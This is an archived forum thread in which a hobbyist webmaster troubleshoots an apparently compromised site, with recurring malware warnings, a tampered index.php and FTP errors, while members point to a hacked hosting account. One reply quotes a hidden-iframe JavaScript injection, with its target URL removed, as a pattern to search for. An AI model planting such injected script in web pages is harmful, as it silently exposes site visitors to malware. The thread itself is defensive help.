PDA

View Full Version : Virus on my own website

GTB
09-15-2009, 11:44 AM
Hi, I am not sure where to put this question so please feel free to move it.

I am getting a virus warning on my own website and I have no idea how to correct it.

http://www.thegtb.co.uk/images/shield1
http://www.thegtb.co.uk/images/shield2
Does anyone know what I can do to stop this ?

A quick update, this seems to be ok in firefox but not i.e.
But it's still a big problem though.

Corrosive
09-15-2009, 12:15 PM
You should really contact your hosts about this.

GTB
09-15-2009, 12:18 PM
Thanks for quick reply.
It seems to have fixed itself now though.

domedia
09-16-2009, 02:06 PM
It seems to have fixed itself now though. The Virus fixed itself? ;)
Doubt it..

GTB
09-16-2009, 03:25 PM
You're absolutely right.

It's back again, but it seems that it is only the homepage (index.php) that is causing a problem.

Does anyone else have the same problem when viewing my site ?

domedia
09-16-2009, 03:32 PM
Noone should go to your site until you get it fixed.
Get some good malware/virus protection software and contact your host ASAP.

GTB
09-16-2009, 10:55 PM
Well my Host say they don't support these kind of problems.

I have now created a new index.php and deleted the index.php that was there already and the problem has gone.

I can't think why though as the code is basically the same.

Having googled the problem it looks to me like this is more of an I.E issue than a virus.

GTB
09-16-2009, 11:28 PM
Would you believe it.

No sooner I say that then it starts going wrong on Firefox now.

I have just tried to add a game to the website and I am getting this error now.

111.php - Put operation successful
..\includes\left_links.php - error occurred - An FTP error occurred - cannot put left_links.php. Access denied. The file may not exist, or there could be a permission problem. Make sure you have proper authorization on the server and the server is properly configured.
..\includes\right_links.php - error occurred - An FTP error occurred - cannot put right_links.php. Access denied. The file may not exist, or there could be a permission problem. Make sure you have proper authorization on the server and the server is properly configured.
File activity incomplete. 2 file(s) or folder(s) were not completed.
Files updated: 1
Files with errors: 2
..\includes\left_links.php
..\includes\right_links.php
Finished: 17/09/2009 00:23

The thing is, nothing has changed with regard to permissions or anything else for that matter and the file does exist because all I am doing is copying the html from one page to another then replacing the game name.
(It wont even load the game that I already have on the website)

What on earth could be going on ?

DWcourse
09-17-2009, 01:28 AM
Any chance you've used up your disk space allotment?

In any case it sounds like a new hosting service might be a good idea (if they won't help with issues like you're running into).

GTB
09-17-2009, 01:43 AM
I use "Just Host" which give unlimited space/bandwidth etc.

To be fair to them they are usually very good with any problems that arise and usually sort things very quickly.

I don't really see what they can do to be honest.

For some reason it's running ok now with I.E but I am getting the same alerts with Firefox.

This has only started since I have been running the "includes" on the site, but the thing is they were working fine until now.

I am not a very good person with computers, and I am quietly proud of what I have created with the site seeing as I learnt to do it all myself from forums and books etc.

I am half tempted to take the site to a web designer and pay them to sort it all out, but that would diminish the pleasure of it all I think.

edbr
09-17-2009, 02:05 AM
well it could be a security issue so the hoster should at least be checking that.
i just did a yahoogle and found this link old but might be pertinent
http://forum.joomla.org/viewtopic.php?f=267&t=272088
check if you have files containing
<!-- counter --><script language=javascript>status=location;document.write('<iframe src="************" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->
the link i removed

GTB
09-17-2009, 03:05 PM
This is actually getting so strange I am beginning to find it funny.

Now I am getting this error all the time.Parse error: syntax error, unexpected $end in /home/thegtbc1/public_html/index.php on line 80
But, if I republish the index.php the page works for a while then decides it has this problem.

domedia
09-17-2009, 04:23 PM
I don't see the mystery at all.

Your hosting account has been compromised. Until you take the needed steps, you're not getting rid of this.

Let your host know your account has been compromised. If your host don't see this as a problem.. change host and ask for you money back.

Corrosive
09-17-2009, 04:23 PM
I'll have to refer you back to my original advice and say 'contact your host!' again. :)

vinnyvangogh
09-21-2009, 03:57 AM
Thanks for quick reply.
It seems to have fixed itself now though.

On the simple , basic - sounds daft solution...can you just delete the web files or folder and having cleared the server...upload a "safe" version of the files?

GTB
09-21-2009, 04:49 PM
Well here is a strange thing.

I usually use the internal FTP with Dreamweaver to upload/Delete files from the site.

Then I realised that the index page was being changed somehow after I uploaded it.

I then tried to download the index from the remote server but it wouldn't let me because it had a virus attached.

So I thought I would try using Filezilla to download the file.

When I opened filezilla every file I had ever uploaded to the website was still there on the website including the old index.htm file.

Now I am not sure how this could have happened (Maybe someone will know)

I have had the index.php file there now for quite a while and things seem to be OK apart from a warning when I try to open the site via Firefox on my desktop.

It opens fine in I.E on my desktop and fine in I.E and Firefox on my laptop.

Could it be that a conflict of index.php and index.htm was causing this.

Fingers crossed that I might have sorted this, thanks for advice guys.

I will be on the lookout for a new host if this doesn't work.